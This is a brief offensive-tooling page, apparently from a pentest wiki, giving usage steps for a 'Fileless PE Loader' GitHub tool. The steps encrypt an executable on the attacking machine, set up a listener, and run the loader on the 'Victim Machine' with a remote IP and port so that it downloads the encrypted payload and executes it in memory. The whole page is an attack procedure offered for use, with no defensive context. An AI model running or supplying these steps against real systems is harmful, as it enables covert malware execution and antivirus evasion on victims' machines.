githubEdit

Fileless PE Loader

Github repo: https://github.com/SaadAhla/FilelessPELoader

Usage:

Attacking Machine:

1)

python3 aes.py PE.exe

2) After running the program, a cipher.bin and a key.bin is left in the current working directory (Check with ls)

3) Setup Listener

Victim Machine

1) Compile with Visual Studio

2)

FilelessPELoader.exe REMOTE_IP PORT CIPHER.bin KEY.bin

3) GG

Last updated